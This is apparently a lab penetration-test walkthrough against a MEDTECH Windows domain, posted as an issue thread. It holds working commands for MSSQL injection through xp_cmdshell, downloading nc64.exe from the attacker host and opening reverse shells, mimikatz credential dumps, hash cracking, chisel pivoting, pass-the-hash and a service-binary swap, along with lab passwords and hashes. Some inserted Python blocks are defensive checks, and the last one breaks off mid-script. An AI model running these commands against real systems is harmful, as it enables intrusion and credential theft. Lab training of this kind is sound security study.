Open WDavid404 opened 6 months ago
searchsploit for ruby v2.7/WEBrick/ssh v8.4/jekyll
--> No info
Access port 80 via web browser
gobuster dir -u http://192.168.221.120 -w /usr/share/wordlists/dirb/common.txt -x txt,pdf,config
/404 (Status: 200) [Size: 4328]
/about (Status: 301) [Size: 44] [--> http://192.168.221.120/about/]
/assets (Status: 301) [Size: 46] [--> http://192.168.221.120/assets/]
/index (Status: 200) [Size: 4649]
/index.html (Status: 200) [Size: 4649]
/robots.txt (Status: 200) [Size: 36]
/sitemap.xml (Status: 200) [Size: 503]
/static (Status: 301) [Size: 46] [--> http://192.168.221.120/static/]
- gobuster dir -u http://192.168.221.120/jekyll -w /usr/share/wordlists/dirb/common.txt -x txt,pdf,config
---> No info
----------->
SSH Login:
ssh offsec@192.168.214.120 (pwd: century62hisan51)
sudo su
--> succeeded in becoming root!
find / -name proof.txt 2>/dev/null ---> succeeded.
http://192.168.221.121/login.aspx --> SQL injection and SQL server is MSSQL
' order by 1,2,3,4,5,6 --//
====> column count is 2
' UNION SELECT null,null--//
' UNION SELECT null,CURRENT_USER--//
--> No SQL error ---> blind injection?
' IF 1=1 WAITFOR DELAY '0:0:5' ELSE WAITFOR DELAY '0:0:0';--
--> it works!
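The injection above works because login.aspx splices the submitted username into the SQL text, and the web.config found later on this page shows the application connecting as sa, which is what put sp_configure and xp_cmdshell within reach. As an added example (not code from the original post or the lab), here is the vulnerable query style beside the parameterized fix, using an in-memory SQLite table as a stand-in for the MSSQL backend. The users table, its rows and the probe helper are constructed; MSSQL-only payloads (WAITFOR DELAY, stacked EXEC) are not exercised, only how each query style treats the page's ORDER BY, UNION and OR probes.

```python
import sqlite3

# Constructed stand-in for the login.aspx backend: an in-memory SQLite table
# with two columns, matching the column count the ORDER BY probe found.
# MSSQL-specific payloads (WAITFOR DELAY, stacked EXEC sp_configure) are not
# exercised here; what is shown is how each query style treats the input.
SAMPLE_USERS = [("alice", "correct-horse"), ("bob", "battery-staple")]


def _connect():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", SAMPLE_USERS)
    return conn


def login_vulnerable(username, password):
    """String-concatenated query: the input becomes part of the SQL text,
    so quotes, UNION and comment sequences in it are executed as SQL."""
    sql = (
        "SELECT username, password FROM users WHERE username = '"
        + username + "' AND password = '" + password + "'"
    )
    return _connect().execute(sql).fetchall()


def login_parameterized(username, password):
    """Bound parameters: the driver sends the values separately from the SQL
    text, so the same input can only ever be compared as a literal string."""
    sql = "SELECT username, password FROM users WHERE username = ? AND password = ?"
    return _connect().execute(sql, (username, password)).fetchall()


def probe(login_fn, username, password="x"):
    """Summarise an attempt as ('rows', n) or ('error', message), which is the
    signal the page's ORDER BY column-count probe relies on."""
    try:
        return ("rows", len(login_fn(username, password)))
    except sqlite3.OperationalError as exc:
        return ("error", str(exc))


if __name__ == "__main__":
    for payload in ["' ORDER BY 3--", "' UNION SELECT null,null--", "' OR 1=1--"]:
        print(payload, "vulnerable:", probe(login_vulnerable, payload),
              "parameterized:", probe(login_parameterized, payload))
```

Parameterization removes the injection, but the sa login is a separate finding: even a non-injectable application should connect with a database login that is not sysadmin, so that sp_configure cannot enable xp_cmdshell from the application's context, and xp_cmdshell should stay disabled on the instance.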
[On Kali] Prepare a nc64.exe file (https://github.com/int0x33/nc.exe/blob/master/nc64.exe) and run python3 -m http.server 80
';EXEC sp_configure 'show advanced options', 1 -- //
%27%3BEXEC%20sp_configure%20%27show%20advanced%20options%27%2C%201%20--%20%2F%2F
';RECONFIGURE -- //
%27%3BRECONFIGURE%20--%20%2F%2F
';EXECUTE sp_configure 'xp_cmdshell', 1;--//
%27%3BEXECUTE%20sp_configure%20%27xp_cmdshell%27%2C%201%3B--%2F%2F
';RECONFIGURE -- //
%27%3BRECONFIGURE%20--%20%2F%2F
then,
';EXECUTE xp_cmdshell "certutil -urlcache -f http://192.168.45.152/nc64.exe c:/windows/temp/nc64.exe";--
%27%3BEXECUTE%20xp_cmdshell%20%22certutil%20-urlcache%20-f%20http%3A%2F%2F192.168.45.152%2Fnc64.exe%20c%3A%2Fwindows%2Ftemp%2Fnc64.exe%22%3B--
then,
';EXECUTE xp_cmdshell "c:/windows/temp/nc64.exe -e cmd.exe 192.168.45.152 4444";--
%27%3BEXECUTE%20xp_cmdshell%20%22c%3A%2Fwindows%2Ftemp%2Fnc64.exe%20-e%20cmd.exe%20192.168.45.152%204444%22%3B--
==> the nc listener gets a reverse shell from the target:
On the victim:
powershell
PS C:\TEMP> whoami /priv
Privilege Name Description State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token Disabled
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeManageVolumePrivilege Perform volume maintenance tasks Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
iwr -uri http://192.168.45.152/PrintSpoofer64.exe -Outfile PrintSpoofer64.exe
.\PrintSpoofer64.exe -i -c powershell.exe ---> Try again... Succeeded!
then, try using mimikatz:
certutil -urlcache -f http://192.168.45.152/mimikatz.exe c:/temp/mimikatz.exe (Note: I used iwr at first but it failed.)
powershell -ep bypass
mimikatz # privilege::debug
mimikatz # sekurlsa::logonpasswords
-->
* Username : joe
* Domain : MEDTECH
* NTLM : 08d7a47a6f9f66b97b1bae4178747494
* Domain : MEDTECH.COM
* Password : Flowers1
next,
mimikatz # token::elevate ## to elevate to SYSTEM user privileges.
mimikatz # lsadump::sam
-->
Domain : WEB02
User : Administrator
Hash NTLM: b2c03054c306ac8fc5f9d188710b0168
User : offsec
Hash NTLM: 2892d26cdf84d7a70e2eb3b9f05c425e
Try to crack offsec's hash:
echo "2892d26cdf84d7a70e2eb3b9f05c425e" > offsec.hash
hashcat -m 1000 offsec.hash /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force
--> offsec's password is 'lab'
--> try to establish an ssh tunnel on this host.
[Victim] ssh -V ---> OpenSSH_for_Windows_8.1p1, LibreSSL 3.0.2
ssh -N -D 9999 kali@192.168.45.211 -vvv --->
debug3: Failed to open file:C:/Windows/system32/config/systemprofile/.ssh/known_hosts error:2
debug3: Failed to open file:C:/Windows/system32/config/systemprofile/.ssh/known_hosts2 error:2
debug3: Failed to open file:C:/ProgramData/ssh/ssh_known_hosts error:2
debug3: Failed to open file:C:/ProgramData/ssh/ssh_known_hosts2 error:2
debug3: failed to open file:C:/dev/tty error:3
debug1: read_passphrase: can't open /dev/tty: No such file or directory
... ---> didn't find a solution...
Try using chisel: [Kali] download chisel into the current directory (https://github.com/jpillora/chisel/releases/tag/v1.9.1, download the windows amd64 one and the linux one). For the linux version of chisel:
kali@kali:~/beyond$ chmod a+x chisel
kali@kali:~/beyond$ ./chisel server -p 8000 --reverse
[Victim]
iwr -uri http://192.168.45.152/chisel.exe -Outfile chisel.exe
.\chisel client 192.168.45.152:8000 R:1080:socks
ok! HTTP channel is established via Chisel!
[Kali] edit '/etc/proxychains4.conf' ==> socks5 127.0.0.1 1080 (port 1080 is the same port given in the chisel client command above, R:1080:socks)
proxychains -q crackmapexec smb 172.16.206.10-14 172.16.206.82-83 -u joe -d MEDTECH.COM -p "Flowers1" --shares
SMB 172.16.206.10 445 DC01 [*] Windows 10.0 Build 20348 x64 (name:DC01) (domain:MEDTECH.COM) (signing:True) (SMBv1:False)
SMB 172.16.206.83 445 CLIENT02 [*] Windows 10.0 Build 22000 x64 (name:CLIENT02) (domain:MEDTECH.COM) (signing:False) (SMBv1:False)
SMB 172.16.206.13 445 PROD01 [*] Windows 10.0 Build 20348 x64 (name:PROD01) (domain:MEDTECH.COM) (signing:False) (SMBv1:False)
SMB 172.16.206.12 445 DEV04 [*] Windows 10.0 Build 20348 x64 (name:DEV04) (domain:MEDTECH.COM) (signing:False) (SMBv1:False)
SMB 172.16.206.11 445 FILES02 [*] Windows 10.0 Build 20348 x64 (name:FILES02) (domain:MEDTECH.COM) (signing:False) (SMBv1:False)
SMB 172.16.206.82 445 CLIENT01 [*] Windows 10.0 Build 22000 x64 (name:CLIENT01) (domain:MEDTECH.COM) (signing:False) (SMBv1:False)
SMB 172.16.206.10 445 DC01 [+] MEDTECH.COM\joe:Flowers1
SMB 172.16.206.83 445 CLIENT02 [+] MEDTECH.COM\joe:Flowers1
SMB 172.16.206.13 445 PROD01 [+] MEDTECH.COM\joe:Flowers1
SMB 172.16.206.13 445 PROD01 [+] Enumerated shares
SMB 172.16.206.13 445 PROD01 Share Permissions Remark
SMB 172.16.206.13 445 PROD01 ----- ----------- ------
SMB 172.16.206.13 445 PROD01 ADMIN$ Remote Admin
SMB 172.16.206.13 445 PROD01 C$ Default share
SMB 172.16.206.13 445 PROD01 IPC$ READ Remote IPC
SMB 172.16.206.83 445 CLIENT02 [+] Enumerated shares
SMB 172.16.206.83 445 CLIENT02 Share Permissions Remark
SMB 172.16.206.83 445 CLIENT02 ----- ----------- ------
SMB 172.16.206.83 445 CLIENT02 ADMIN$ Remote Admin
SMB 172.16.206.83 445 CLIENT02 C READ
SMB 172.16.206.83 445 CLIENT02 C$ Default share
SMB 172.16.206.83 445 CLIENT02 IPC$ READ Remote IPC
SMB 172.16.206.83 445 CLIENT02 Windows READ
SMB 172.16.206.12 445 DEV04 [+] MEDTECH.COM\joe:Flowers1
SMB 172.16.206.10 445 DC01 [+] Enumerated shares
SMB 172.16.206.10 445 DC01 Share Permissions Remark
SMB 172.16.206.10 445 DC01 ----- ----------- ------
SMB 172.16.206.10 445 DC01 ADMIN$ READ Remote Admin
SMB 172.16.206.10 445 DC01 C$ READ,WRITE Default share
SMB 172.16.206.10 445 DC01 IPC$ READ Remote IPC
SMB 172.16.206.10 445 DC01 NETLOGON READ Logon server share
SMB 172.16.206.10 445 DC01 SYSVOL READ Logon server share
SMB 172.16.206.12 445 DEV04 [+] Enumerated shares
SMB 172.16.206.12 445 DEV04 Share Permissions Remark
SMB 172.16.206.12 445 DEV04 ----- ----------- ------
SMB 172.16.206.12 445 DEV04 ADMIN$ Remote Admin
SMB 172.16.206.12 445 DEV04 C$ Default share
SMB 172.16.206.12 445 DEV04 IPC$ READ Remote IPC
SMB 172.16.206.11 445 FILES02 [+] MEDTECH.COM\joe:Flowers1 (Pwn3d!)
SMB 172.16.206.82 445 CLIENT01 [+] MEDTECH.COM\joe:Flowers1
SMB 172.16.206.82 445 CLIENT01 [+] Enumerated shares
SMB 172.16.206.82 445 CLIENT01 Share Permissions Remark
SMB 172.16.206.82 445 CLIENT01 ----- ----------- ------
SMB 172.16.206.82 445 CLIENT01 ADMIN$ Remote Admin
SMB 172.16.206.82 445 CLIENT01 C$ Default share
SMB 172.16.206.82 445 CLIENT01 IPC$ READ Remote IPC
SMB 172.16.206.11 445 FILES02 [+] Enumerated shares
SMB 172.16.206.11 445 FILES02 Share Permissions Remark
SMB 172.16.206.11 445 FILES02 ----- ----------- ------
SMB 172.16.206.11 445 FILES02 ADMIN$ READ,WRITE Remote Admin
SMB 172.16.206.11 445 FILES02 C READ,WRITE
SMB 172.16.206.11 445 FILES02 C$ READ,WRITE Default share
SMB 172.16.206.11 445 FILES02 IPC$ READ Remote IPC
SMB 172.16.206.11 445 FILES02 TEMP READ,WRITE
-- sudo proxychains -q xfreerdp /d:'MEDTECH.COM' /u:'joe' /p:'Flowers1' /f +fonts +clipboard /v:172.16.206.82 --->
[06:41:19:211] [230042:230044] [ERROR][com.freerdp.core] - transport_read_layer:freerdp_set_last_error_ex ERRCONNECT_CONNECT_TRANSPORT_FAILED [0x0002000D]
[06:41:19:211] [230042:230044] [ERROR][com.freerdp.core] - freerdp_post_connect failed
proxychains -q impacket-psexec -hashes 000000000000000000000000000000000:8d7a47a6f9f66b97b1bae4178747494 joe@172.16.206.11 -----> Succeeded!
sudo proxychains nmap -sT 172.16.206.10-14 -p 22 --> 172.16.206.14 has port 22 open. ---> Tried 'sudo proxychains ssh joe@172.16.206.14' but it failed: permission denied.
proxychains impacket-GetNPUsers -dc-ip 172.16.193.10 -request -outputfile hashes.asreproast medtech.com/joe
--> No entries found!
proxychains -q crackmapexec smb 172.16.193.10-14 172.16.193.82-83 -u offsec -d MEDTECH.COM -p "lab" --shares
-->
172.16.193.10 445 DC01 [+] MEDTECH.COM\offsec:lab
172.16.193.11 445 FILES02 [+] MEDTECH.COM\offsec:lab
172.16.193.12 445 DEV04 [+] MEDTECH.COM\offsec:lab
172.16.193.13 445 PROD01 [+] MEDTECH.COM\offsec:lab
172.16.193.83 445 CLIENT02 [+] MEDTECH.COM\offsec:lab
172.16.193.82 445 CLIENT01 [+] MEDTECH.COM\offsec:lab
proxychains impacket-GetNPUsers -dc-ip 172.16.193.10 -request -outputfile hashes.asreproast medtech.com/offsec
--> No entries found!
proxychains -q nmap -sT 172.16.206.10-14
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-14 10:26 EDT
Nmap scan report for 172.16.206.10
Host is up (0.000025s latency).
Not shown: 993 closed tcp ports (conn-refused)
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
593/tcp open http-rpc-epmap
Nmap scan report for 172.16.206.11
Host is up (0.000024s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
Nmap scan report for 172.16.206.12
Host is up (0.000025s latency).
Not shown: 996 closed tcp ports (conn-refused)
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3389/tcp open ms-wbt-server
Nmap scan report for 172.16.206.13
Host is up (0.000024s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
Nmap scan report for 172.16.206.14
Host is up (0.000024s latency).
Not shown: 999 closed tcp ports (conn-refused)
PORT STATE SERVICE
22/tcp open ssh
sudo proxychains nmap -sT 172.16.206.82-83 -o nmap_result2
Nmap scan report for 172.16.206.82
Host is up (0.23s latency).
Not shown: 996 closed tcp ports (conn-refused)
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3389/tcp open ms-wbt-server
Nmap scan report for 172.16.206.83
Host is up (0.22s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
Other:
Get-ChildItem -Path C:\ -Include *.kdbx -File -Recurse -ErrorAction SilentlyContinue --> No info
Get-ChildItem -Path C:\ -Include local.txt -File -Recurse -ErrorAction SilentlyContinue --> No info
net user /domain --> FAILED, because this host is not joined to the AD domain.
try ssh joe@192.168.211.120/122 --> failed..
cd C:\TEMP
iwr -uri http://192.168.45.203/winPEASx64.exe -Outfile winPEAS.exe
.\winPEAS.exe ----> did not find any useful info, except C:\inetpub\wwwroot\assets\js\jquery.form.js: username', value: 'jresig' }, { name: 'password', value: 'secret' } ]
cd C:\TEMP
wmic service get name,pathname | findstr /i /v "C:\Windows\" | findstr /i /v """ --> No useful info
iwr -uri http://192.168.45.203/SharpHound.ps1 -Outfile SharpHound.ps1
powershell -ep bypass
Import-Module .\Sharphound.ps1
Invoke-BloodHound -CollectionMethod All -OutputDirectory C:\Temp\
---> 2024-03-12T07:24:01.7181243-07:00|ERROR|Unable to connect to LDAP, verify your credentials (yes, the current user is not a domain user)
cd C:\inetpub\wwwroot
web.config
... connectionString=" server=localhost\SQLEXPRESS; database=webapp; uid=sa; password=WhileChirpTuesday218; ...
$SqlConnection.ConnectionString = "Server =127.0.0.1\SQLEXPRESS; Database = webapp; User ID = sa; Password = WhileChirpTuesday218;"
select * from INFORMATION_SCHEMA.TABLES
select * from users --> no info, empty result..
proxychains -q impacket-psexec -hashes 000000000000000000000000000000000:8d7a47a6f9f66b97b1bae4178747494 joe@172.16.206.11 --> login to the victim.
net user /domain
According to the following info:
SMB 172.16.206.11 445 FILES02 Share Permissions Remark
SMB 172.16.206.11 445 FILES02 ----- ----------- ------
....
SMB 172.16.206.11 445 FILES02 TEMP READ,WRITE
[Kali] upload the mimikatz.exe file to the victim:
proxychains smbclient //172.16.208.11/TEMP -c 'put mimikatz.exe' --user=MEDTECH.COM/joe%Flowers1
[Victim]
powershell -ep bypass
mimikatz # privilege::debug
mimikatz # sekurlsa::logonpasswords ---> No useful info...
mimikatz # token::elevate ## to elevate to SYSTEM user privileges.
mimikatz # lsadump::sam ---> User : WDAGUtilityAccount Hash NTLM: 0c6ce171c9cc3afb29ca0ccc335e49bb
Get-ChildItem -Path C:\Users -Include *.txt,*.pdf,*.xls,*.xlsx,*.doc,*.docx -File -Recurse -ErrorAction SilentlyContinue
--> find local.txt, proof.txt
proxychains smbclient //172.16.208.11/TEMP -c 'put mimikatz.exe' --user=MEDTECH.COM/joe%Flowers1
--> No info
net group /domain
PS C:\temp> net group /domain
*Cloneable Domain Controllers
*DnsUpdateProxy
*Domain Admins
*Domain Computers
*Domain Controllers
*Domain Guests
*Domain Users
*Enterprise Admins
*Enterprise Key Admins
*Enterprise Read-only Domain Controllers
*Group Policy Creator Owners
*Key Admins
*Protected Users
*Read-only Domain Controllers
*Schema Admins
net group "Domain Admins" /domain
-->
Administrator leon
net group "Domain Users" /domain
-->
Administrator joe krbtgt
leon mario offsec
peach wario yoshi
net group "Domain Computers" /domain
-->
CLIENT01$ CLIENT02$ DEV04$
FILES02$ PROD01$ WEB02$
[Kali] proxychains smbclient //172.16.208.11/TEMP -c 'put PowerView.ps1' --user=MEDTECH.COM/joe%Flowers1
PS Import-Module .\PowerView.ps1
PS Get-NetUser | select cn,pwdlastset,lastlogon
cn             pwdlastset              lastlogon
Administrator  12/5/2022 11:04:32 AM   3/15/2024 7:21:46 PM
Guest          12/31/1600 4:00:00 PM   12/31/1600 4:00:00 PM
offsec         9/27/2022 10:33:23 AM   12/31/1600 4:00:00 PM
krbtgt         9/27/2022 10:47:41 AM   12/31/1600 4:00:00 PM
leon           11/17/2022 12:36:23 PM  3/15/2024 8:49:43 PM
joe            11/11/2022 2:02:39 AM   2/28/2023 5:41:40 AM
peach          9/28/2022 3:51:13 AM    12/31/1600 4:00:00 PM
mario          9/28/2022 3:50:46 AM    12/31/1600 4:00:00 PM
wario          11/15/2022 1:43:27 AM   11/15/2022 1:43:35 AM
yoshi          11/15/2022 5:25:26 AM   10/6/2022 3:44:30 AM
-----------------> No more hints now....
... ... ...
Get-ChildItem -Path C:\ -Filter "log" -Recurse -ErrorAction SilentlyContinue --> found c:\users\joe\Documents\fileMonitorBackup.log
---> PS type c:\users\joe\Documents\fileMonitorBackup.log|select-string NTLM
88934 Oct 04 11:21 Backup daisy 6872 Backup Completed. NTLM:
abf36048c1cf88f5603381c5128feb8e
88605 Oct 04 11:21 Backup toad 6872 Backup Completed. NTLM:
5be63a865b65349851c1f11a067a3068
88137 Oct 04 11:21 Backup wario 6872 Backup Completed. NTLM:
fdf36048c1cf88f5630381c5e38feb8e
87139 Oct 04 11:21 Backup goomba 6872 Backup Completed. NTLM:
8e9e1516818ce4e54247e71e71b5f436 6872 Backup Complet
Note: On kali, 'cat fileMonitorBackup.log|grep NTLM' doesn't work...
---> [On Kali] Try to crack wario's hash
echo "fdf36048c1cf88f5630381c5e38feb8e">wario.hash
hashcat -m 1000 wario.hash /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force
-->
Mushroom!
PS: trying to crack the other hashes all failed.
[On Kali] proxychains -q crackmapexec smb 172.16.208.10-14 172.16.208.82-83 -u wario -d MEDTECH.COM -p "Mushroom!" --shares --> no admin host
net localgroup
net localgroup "Remote desktop users" --> medtech/yoshi
[On Kali] proxychains -q crackmapexec winrm 172.16.208.10-14 172.16.208.82-83 -u wario -d MEDTECH.COM -p "Mushroom!"
---> WINRM 172.16.208.83 5985 172.16.208.83 [+] MEDTECH.COM\wario:Mushroom! (Pwn3d!)
proxychains -q evil-winrm -i 172.16.208.83 -u \wario -p "Mushroom!" ---------> SUCCEED!
[Kali] proxychains -q evil-winrm -i 172.16.208.83 -u wario -p "Mushroom\!"
(No domain name needed)
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
Evil-WinRM PS C:\Users\wario\Documents> ls
Evil-WinRM PS C:\Users\wario\Documents> whoami
medtech\wario
whoami /priv ---> No 'SeImpersonatePrivilege', so can't use PrintSpoofer64.exe
Evil-WinRM PS C:\users\wario> services ---> C:\DevelopmentExecutables\auditTracker.exe ===> we can replace it to abuse it.
Evil-WinRM PS C:\Users\wario\Documents> icacls "C:\DevelopmentExecutables\auditTracker.exe"
C:\DevelopmentExecutables\auditTracker.exe Everyone:(I)(F)
                                           BUILTIN\Administrators:(I)(F)
                                           NT AUTHORITY\SYSTEM:(I)(F)
                                           BUILTIN\Users:(I)(RX)
                                           NT AUTHORITY\Authenticated Users:(I)(M)
----> We have Read and Execute (RX) rights.
[On Kali] Prepare a file called addwario.c
#include <stdlib.h>
int main ()
{
int i;
i = system ("net localgroup administrators wario /add");
return 0;
}
cross-compile the code on our Kali machine with mingw-w64:
kali@kali:~$ x86_64-w64-mingw32-gcc addwario.c -o addwario.exe
[Victim]
Evil-WinRM PS C:\users\wario\Documents> upload addwario.exe .
Evil-WinRM PS C:\users\wario\Documents> move C:\DevelopmentExecutables\auditTracker.exe auditTracker_bk.exe
Evil-WinRM PS C:\users\wario\Documents> move .\addwario.exe C:\DevelopmentExecutables\auditTracker.exe
Evil-WinRM PS C:\users\wario\Documents> shutdown /r /t 0 ---> Access denied
Evil-WinRM PS C:\users\wario\Documents> sc.exe stop/start auditTracker ---> Works! wario has been added to the local admin group: "Get-LocalGroupMember administrators" ---> Need to log in again via Evil-WinRM as wario for it to take effect.
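The icacls output above is the finding that makes the service binary swap possible: a principal every logged-on user belongs to holds a write-capable right on a file that a service runs under its own account. As an added example, not code from the original post, this Python parser reads the output of icacls for one path and flags ACEs where a low-privileged principal (Everyone, BUILTIN\Users, Authenticated Users, INTERACTIVE) has any right that allows changing the file. The sample output is constructed to mirror the ACEs listed above; the principal set and the write-right set are my own choice of what counts as weak, not an icacls concept.

```python
import re

# Constructed icacls output for the service binary discussed above; the
# ACE list mirrors what the page shows for auditTracker.exe.
SAMPLE_PATH = r"C:\DevelopmentExecutables\auditTracker.exe"
SAMPLE_ICACLS = (
    r"C:\DevelopmentExecutables\auditTracker.exe Everyone:(I)(F)" "\n"
    r"                                           BUILTIN\Administrators:(I)(F)" "\n"
    r"                                           NT AUTHORITY\SYSTEM:(I)(F)" "\n"
    r"                                           BUILTIN\Users:(I)(RX)" "\n"
    r"                                           NT AUTHORITY\Authenticated Users:(I)(M)" "\n"
    "\n"
    "Successfully processed 1 files; Failed processing 0 files\n"
)

# Principals that every interactive or authenticated user belongs to
# (my own choice of set, not an icacls concept).
LOW_PRIV_PRINCIPALS = {
    "everyone",
    r"builtin\users",
    r"nt authority\authenticated users",
    r"nt authority\interactive",
}

# icacls rights that allow changing or replacing the file: simple rights
# F/M/W/D plus the specific rights for write data, append, delete child,
# change permissions, take ownership, and the generic all/write flags.
WRITE_RIGHTS = {"F", "M", "W", "D", "WD", "AD", "DC", "WDAC", "WO", "GA", "GW"}


def parse_icacls(output: str, path: str):
    """Return [(principal, [flag, ...])] from `icacls <path>` output.
    icacls prints the path before the first ACE and one ACE per line,
    so the path is stripped and each remaining line is split on its
    last ':' (principals never contain one, the rights block always does)."""
    aces = []
    for line in output.splitlines():
        if line.startswith(path):
            line = line[len(path):]
        line = line.strip()
        if not line or line.startswith("Successfully processed"):
            continue
        principal, sep, rights = line.rpartition(":")
        if not sep:
            continue
        aces.append((principal.strip(), re.findall(r"\(([^)]*)\)", rights)))
    return aces


def weak_aces(aces):
    """ACEs that let a low-privileged principal modify the file, which for a
    service binary means it can be swapped for something the service
    account then runs. Returns [(principal, [offending rights])]."""
    findings = []
    for principal, flags in aces:
        rights = {r for flag in flags for r in flag.split(",")}
        hit = rights & WRITE_RIGHTS
        if principal.lower() in LOW_PRIV_PRINCIPALS and hit:
            findings.append((principal, sorted(hit)))
    return findings


if __name__ == "__main__":
    for principal, rights in weak_aces(parse_icacls(SAMPLE_ICACLS, SAMPLE_PATH)):
        print(f"weak ACE on {SAMPLE_PATH}: {principal} has {','.join(rights)}")
```

Run it over icacls output collected for every service ImagePath on a build (the PathName column from Win32_Service, as queried elsewhere on this page, gives the list). A hit means the binary's directory needs inherited permissions broken and write access limited to Administrators and SYSTEM; the (M) entry for Authenticated Users above is exactly the right that let the file be moved aside and replaced.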
Get-ChildItem -Path C:\Users -Include *log*,*ini,*.txt,*.pdf,*.xls,*.xlsx,*.doc,*.docx -File -Recurse -ErrorAction SilentlyContinue
---> test.log but no useful info
net user /domain --> .83 is not in the domain.
Try using mimikatz.exe Evil-WinRM PS C:\DevelopmentExecutables> upload mimikatz.exe .
------------> Suggested to use msfvenom to get a direct reverse shell
[Kali] msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.45.223 LPORT=4445 -f exe -o met.exe
use metasploit multi/handler to receive the reverse shell: sudo msfconsole -q
[Victim]
Evil-WinRM PS C:\DevelopmentExecutables> upload met.exe .
Evil-WinRM PS C:\DevelopmentExecutables> .\met.exe ---> the metasploit listener will get a reverse shell from the victim.
powershell -ep bypass
mimikatz # privilege::debug
mimikatz # sekurlsa::logonpasswords ----> No useful info
mimikatz # token::elevate ## to elevate to SYSTEM user privileges.
mimikatz # lsadump::sam ----> No useful info
Get-ChildItem -Path C:\ -Include *.kdbx -File -Recurse -ErrorAction SilentlyContinue --> No useful info.
Try to REUSE known passwords! When you have run out of options, try password reuse! ---> found that yoshi uses the same password as wario!
You are in the dark about such things during a pen test, but it is something you can try just in case. At least the likelihood of password reuse is higher than that of random brute force.
proxychains -q crackmapexec smb 172.16.228.10-14 172.16.228.82-83 -u yoshi -d MEDTECH.COM -p "Mushroom!" --> SMB 172.16.228.82 445 CLIENT01 [+] MEDTECH.COM\yoshi:Mushroom! (Pwn3d!)
proxychains -q impacket-psexec -hashes 000000000000000000000000000000000:fdf36048c1cf88f5630381c5e38feb8e yoshi@172.16.228.82 --> logged in successfully!
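Two findings on this page share a root cause that a defender can check for mechanically: the backup tool wrote NTLM hashes into fileMonitorBackup.log in a two-line layout (the hash on the line after "NTLM:"), and yoshi and wario turned out to share a password. As an added example, not code from the original post, this Python script decodes a log whether it is UTF-8 or UTF-16 with a BOM (a UTF-16 file is one reason a byte-oriented `grep NTLM` finds nothing; the page does not say why grep failed there, so that cause is an assumption), extracts (account, hash) pairs across the line break, and groups a directory hash list by identical NTLM value to report password reuse. The log text, the hash values and the directory list are all constructed; only the account names echo the page.

```python
import re
from collections import defaultdict

# Constructed sample log in the two-line layout of fileMonitorBackup.log:
# the hash sits on the line after "NTLM:". It is encoded as UTF-16 with a
# BOM, which is how a PowerShell redirect (Out-File / >) often writes text.
# Account names echo the page; the hash values are made up.
SAMPLE_LOG = (
    "88934 Oct 04 11:21 Backup daisy 6872 Backup Completed. NTLM:\r\n"
    "0123456789abcdef0123456789abcdef\r\n"
    "88605 Oct 04 11:21 Backup toad 6872 Backup Completed. NTLM:\r\n"
    "fedcba9876543210fedcba9876543210\r\n"
    "88137 Oct 04 11:21 Backup wario 6872 Backup Completed. NTLM:\r\n"
    "00112233445566778899aabbccddeeff\r\n"
).encode("utf-16")  # Python prepends the BOM for the "utf-16" codec

# Constructed (account, NTLM) pairs standing in for a domain password audit
# export; wario and yoshi deliberately share a hash, i.e. the same password.
SAMPLE_DIRECTORY = [
    ("wario", "00112233445566778899aabbccddeeff"),
    ("yoshi", "00112233445566778899aabbccddeeff"),
    ("leon", "ffeeddccbbaa99887766554433221100"),
]

# "NTLM:" may be followed by a line break before the hash, so \s* spans it.
ENTRY = re.compile(
    r"Backup\s+(\S+)\s+\d+\s+Backup Completed\.\s*NTLM:\s*([0-9a-fA-F]{32})"
)


def decode_log(raw: bytes) -> str:
    """Decode a log as UTF-16 when it carries a BOM, otherwise as UTF-8.
    In a UTF-16 file every ASCII character is followed by a NUL byte, so a
    byte-oriented `grep NTLM` never matches; decoding first fixes that."""
    if raw[:2] in (b"\xff\xfe", b"\xfe\xff"):
        return raw.decode("utf-16")
    return raw.decode("utf-8", errors="replace")


def extract_leaked_hashes(text: str):
    """Return [(account, ntlm_hash)] for every backup entry that logged a hash."""
    return [(account, h.lower()) for account, h in ENTRY.findall(text)]


def find_shared_hashes(account_hashes):
    """Group accounts by identical NTLM hash. Because NTLM is unsalted, an
    identical hash means an identical password; any group with more than
    one member is password reuse."""
    groups = defaultdict(list)
    for account, h in account_hashes:
        groups[h.lower()].append(account)
    return {h: sorted(accounts) for h, accounts in groups.items() if len(accounts) > 1}


def audit(raw_log: bytes, directory):
    """Combine both checks: which accounts had hashes written to the log,
    which directory accounts are exposed by those hashes (including accounts
    that merely share the leaked password), and which directory accounts
    share a password with each other."""
    leaked = extract_leaked_hashes(decode_log(raw_log))
    leaked_hashes = {h for _, h in leaked}
    return {
        "accounts_in_log": [account for account, _ in leaked],
        "directory_accounts_exposed_by_log": sorted(
            account for account, h in directory if h.lower() in leaked_hashes
        ),
        "shared_passwords": find_shared_hashes(directory),
    }


if __name__ == "__main__":
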